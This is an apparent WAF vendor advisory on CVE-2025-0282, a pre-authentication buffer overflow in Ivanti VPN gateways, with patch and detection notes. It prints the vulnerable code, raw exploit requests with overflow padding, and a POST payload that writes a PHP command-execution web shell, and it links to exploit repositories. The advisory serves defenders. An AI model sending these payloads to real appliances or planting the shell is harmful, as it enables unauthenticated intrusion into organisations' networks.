The vulnerability is a pre-authenticated RCE vulnerability in Ivanti's Connect Secure, Policy Secure, and ZTA Gateway products, which attempts to exploit Buffer Overflow during IF-T/TLS protocol communication.

The vulnerability is patched in 22.7R2.5 for Ivanti Connect Secure and Ivanti ZTA Gateway products, and AIWAF is continuously monitoring related vulnerabilities.

1. Overview

Ivanti's Connect Secure, Policy Secure, and ZTA Gateways, a line of SSL VPN solutions and IPS solutions, recently published an analysis of CVE-2025-0282, a Buffer Overflow-based pre-authentication RCE vulnerability discovered in their platforms.

Source : https://www.helpnetsecurity.com/2025/01/08/ivanti-exploited-connect-secure-zero-day-cve-2025-0282-cve-2025-0283/

2. Attack Type

CVE-2025-0282 is a pre-certification RCE vulnerability in Ivanti's Connect Secure, Policy Secure, and ZTA Gateways products that allows an RCE attack by exploiting a buffer overflow in the IF-T/TLS protocol communication used by OpenConnect, an open source VPN client used by these products.

According to watchtowr, who analyzed the vulnerability, a portion of the code responsible for communicating with the protocol is incorrectly written to copy the size of the input string, rather than the size of the buffer, when using the strncpy function against the clientCapabilities variable, resulting in a BOF if more than 256 bytes of characters are entered.

Some code analyzed by watchtowr as vulnerable :

...
char dest[256];

clientCapabilities = getKey(req, "clientCapabilities");
if ( clientCapabilities != NULL )
{
  clientCapabilitiesLength = strlen(clientCapabilities);
  if ( clientCapabilitiesLength != 0 )
    connInfo->clientCapabilities = clientCapabilities;
}
}
memset(dest, 0, sizeof(dest));
strncpy(dest, connInfo->clientCapabilities, clientCapabilitiesLength);
...

The attacker utilizes this part to first send a GET request to make an IF-T/TLS request, and then proceeds with socket communication according to the protocol specification to attempt an RCE attack.

IF-T/TLS protocol communication request :

GET / HTTP/1.1
Host: 10.0.0.206
User-Agent: BishopFox
Content-Type: EAP
Upgrade: IF-T/TLS 1.0
Content-Length: 0

The socket request you send afterward :

\x00\x00U\x97\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\x00\x00\x01\x02\x02
\x00\x00\nL\x00\x00\x00\x88\x00\x00\x00t\x00\x00\x00\x01clientHostname=BishopFox clientIp=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\x00
\x00\x00\nL\x00\x00\x00\x88\x00\x00\x00\x1b\x00\x00\x00\x02anonymous\n\x00

Alternatively, there are attacks that combine the syntax that causes a buffer overflow with Webshell syntax and send it in a POST request.

BOF and Webshell uploads via POST request :

POST /dana-na/auth/url_default/welcome.cgi HTTP/1.1
Host: 10.0.0.206
Content-Length: 738
Content-Type: application/x-www-form-urlencoded

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`\xa3\x04\x08BBBB\x08\xb0\x04\x08echo \'<?php\n// Usage: http://target.com/shell.php?cmd=<command>\n\nif (isset($_GET[\'cmd\'])) {\n    $cmd = $_GET[\'cmd\'];\n    echo "<pre>" . shell_exec($cmd) . "</pre>";\n} else {\n    echo "No command provided.";\n}\n?>\n\' > /shell.php'

3. Response

While Ivanti has released a patch for CVE-2025-0282, Ivanti Connect Secure and Ivanti ZTA Gateways products can be updated to version 22.7R2.5 or later to address the vulnerability, Ivanti Policy Secure products have not yet been patched and should follow Ivanti's recommended guidelines to avoid exposure to the Internet.

For this vulnerability, attacks occurring in the IF-T/TLS protocol environment do not appear to be covered by the AIWAF pattern, but attacks in combination with Webshell are mostly being detected by the “Webshell” pattern.

4. Conclusion

Over the last year and continuing this year, various vulnerabilities have been discovered and reported against Ivanti's products and solutions, some of which have been identified as more dangerous than others due to their ability to perform RCE attacks without authentication, and require quick updates to the latest versions.

In our AIWAF products, we have developed patterns to respond to vulnerabilities in Ivanti Connect Secure, Policy Secure, and ZTA Gateways, and will continue to respond quickly to related vulnerabilities as they are discovered.

5. References

• https://labs.watchtowr.com/do-secure-by-design-pledges-come-with-stickers-ivanti-connect-secure-rce-cve-2025-0282/
• https://github.com/sfewer-r7/CVE-2025-0282
• https://cloud.google.com/blog/topics/threat-intelligence/ivanti-connect-secure-vpn-zero-day
• https://github.com/absholi7ly/CVE-2025-0282-Ivanti-exploit